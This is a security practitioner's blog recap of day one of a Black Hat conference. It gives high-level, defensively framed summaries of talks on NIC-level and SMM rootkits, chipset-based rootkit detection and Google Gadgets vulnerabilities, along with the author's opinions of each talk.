In the year since I posted Black Hat Final Thoughts for last year's event, a lot has happened. (I also reported on Black Hat Federal 2006 here, here, and here, and Black Hat USA 2003. I attended Black Hat USA 2002 but wasn't blogging then.) In this post I will offer thoughts on the presentations I attended.
- I started Wednesday by attending the keynote by Ian Angell, Professor of Information Systems at the London School of Economics. I want that hour of my life back. Quoting philosophers, looking only at failures and never successes, and pretending your cat can talk doesn't amount to a good speech. This was a low point of the Briefings, although there was enough humor to keep my attention.
- I saw two talks by Sherri Sparks and Shawn Embleton from Clear Hat Consulting. The first was Deeper Door: Exploiting the NIC Chipset, and I describe the second below. They were probably my favorite talks of the entire conference, because they were clear, concise, and informative. And -- shocker -- I skipped the DNS madness in favor of the second of these talks, because the Internet still appears to be working.
Deeper Door is a play on DeepDoor, the rootkit Joanna Rutkowska presented at Black Hat Federal 2006. DeepDoor hooks the Windows Network Driver Interface Specification (NDIS), whereas Deeper Door interacts directly with the LAN controller to read and write packets. Deeper Door works with the Intel 8255x 10/100 Mbps Ethernet Controller Family, and was tested with Intel PRO100B and S NICs. Deeper Door loads as a Windows driver and performs memory-mapped writes to the LAN controller to bypass monitoring and enforcement systems (i.e., host-based firewalls and the like) which assume that processes or applications must be responsible for transmitting packets.
Transmitting traffic is fairly easy, and the demo showed sending hand-crafted UDP traffic past Windows and Zone Alarm firewalls without a problem. Receiving traffic is a little trickier, because receipt of a packet triggers a frame reception (FR) interrupt that will result in a check of the Interrupt Descriptor Table (IDT). One can use traditional techniques like hooking the IDT to get the packet to Deeper Door, or something like a SMM rootkit (described next) or a Blue Pill-like rookit to avoid hooking the IDT. When Deeper Door receives a packet, it can alter the contents to make the packet appear benign (i.e., not a command-and-control packet from the mother ship), or it can completely erase the packet so that the operating system doesn't see it.
The speakers noted that disabling the NIC (via Windows interaction) doesn't stop Deeper Door; it can silently re-enable it. Even uninstalling the NIC (again via Windows) leaves the NIC in a state where it can send, but not receive, traffic.
This presentation reinforced the lesson that relying on an endpoint to defend itself is a bad idea. I've talked about trying to collect traffic on endpoints for incident response purposes, but a rootkit using Deeper Door technology could completely hide suspicious traffic from any host-based sniffer! In 2005 I wrote Rookits Make NSM More Relevant Than Ever, and Deeper Door proves it.
- I stayed for their next talk, A New Breed of Rootkit: The System Management Mode (SMM) Rootkit. SMM was publicly brought to the attention of security researchers in 2006 by Loïc Duflot, followed by Phrack's System Management Mode Hacks by BSDaemon, coideloko, and D0nand0n. Sparks and Embleton wrote a chipset-level keylogger and data exfiltrator that resides in SMM and sends 16 bytes at a time. Combined with their NIC-centric rootkit, it's impressive work. The SMM rootkit demonstrates that chipset-level data structures, like the I/O Redirection Table, are the newest targets of subversion.
Sparks and Embleton claimed their SMM rookit wouldn't be effective on newer systems (say 2006 and on) because a bit in the SMRAM control register called D_LCK is set, but Joanna Rutkowska said a bug in Intel (to be fixed soon) makes clearing D_LCK on newer systems possible without a system reset.
- Staying with the chipset-as-battleground theme, I next attended Insane Detection of Insane Rootkits, or a Chipset Based Approach to Detect Virtualization Malware, a.k.a. DeepWatch, by Yuriy Bulygin. Bulygin recommended using firmware on an Intel microcontroller to detect and remove hypervisor rootkits. Specifically, he puts his code in the microcontroller used for Intel Active Management Technology. As noted on that page, Intel® Active Management Technology requires the platform to have an Intel® AMT-enabled chipset [like vPro], network hardware [like the Intel® 82573E Gigabit Ethernet Controller] and software [on a server]. The platform must also be connected to a power source and an active LAN port. If you know nothing about AMT, I suggest checking it out; the security implications are staggering. Bulygin claimed to be able to detect SMM rootkits, which was an excellent defensive follow-on to the talks I had just seen.
These three talks really emphasized a trend: the chipset is a new battleground. I would like to see a lot more information posted at the Intel Product Security Center. An indicator for me of their willingness to step up to the plate in this new era would be to see an advisory for the bug Joanna mentioned posted at their security site. Somehow I think more than 5 vulnerabilities have been fixed in their code since January 2007. Furthermore, you can include the BIOS as a related battleground. I am worried when I see vendors continue to add functionality into these low-level components. I plan to keep an eye on the Intel Software Network Blog for Manageability for further news.
- Next I attended Xploiting Google Gadgets: Gmalware and Beyond by Tom Stracener and Robert (Rsnake) Hansen. They showed that Google continues to be evil because it thinks being able to track user actions via redirection is more important than fixing security vulnerabilities. I sat with Mike Rash and Keith Jones. Speaking after the talk, I learned Keith was as confused as I was. We concluded that if you're not pen testing Web apps for a living, you probably weren't able to follow all of the vulnerabilities in the presentation since they moved to quickly from issue to POC-as-movie to next issue.
- I finished the day with MetaPost-Exploitation by Val Smith and Colin Ames. This briefing was disappointing. I think the material was better suiting for a training session where the students could have tried the techniques, rather than just watching them.
That's day 1. Please see my next post for day 2.